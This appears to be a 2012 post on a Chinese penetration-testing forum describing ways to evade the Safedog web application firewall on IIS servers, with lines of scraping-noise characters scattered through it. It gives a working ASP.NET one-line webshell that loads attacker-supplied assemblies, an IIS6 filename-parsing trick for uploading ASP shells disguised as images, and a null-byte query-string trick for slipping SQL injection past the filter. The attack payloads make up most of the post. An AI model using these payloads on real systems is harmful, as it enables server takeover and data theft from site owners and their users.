中国网络渗透测试联盟
标题:
突破安全狗防注入及上传的一些思路
[打印本页]
作者:
admin
时间:
2012-10-31 08:25
标题:
突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。
* d! w# [* x( E: J' e: a$ Z
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
* E7 F8 h3 Y+ r+ n$ B* z7 U( A1 I
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
3 [& A7 g/ R$ B: T$ K/ r
1 i8 |9 N8 q2 @! i3 l
2、IIS6.0解析漏洞遇到安全狗。
; w! ^9 {9 b$ ^; M2 ?* Q
文件名为
$ }( I$ S; q% E3 X" F0 X& N) R
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
% b" L; r5 n- ^: C, T+ i
& S, X0 O6 w3 L, o7 t% f
这样的会被IIS安全狗果断屏蔽。
, I/ {/ Y2 H; |& _: }
改成如下名称,IIS6一样会解析:
' E7 b& i6 [5 i0 D. `
www.xxxxx.com/;1.asp;1.jpg
8 E1 a$ w! r- _6 N/ A! m( k
+ e% @2 f2 U+ A A A0 P$ [
3、安全狗的注入绕过。
/ _* `* m8 \2 w) t8 \. q/ r
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
7 X5 n t! R) [" G9 K# k. Z
但如果:
0 F1 l, T9 l( v$ }) d# J- n
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
N4 T% n2 Z8 X
就可以成功绕过了。
$ a, M. |0 D, W) }9 H( k$ t
2 S, z: N j! M0 u7 F
5 d& p; d4 K9 Z& q% Y; w
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2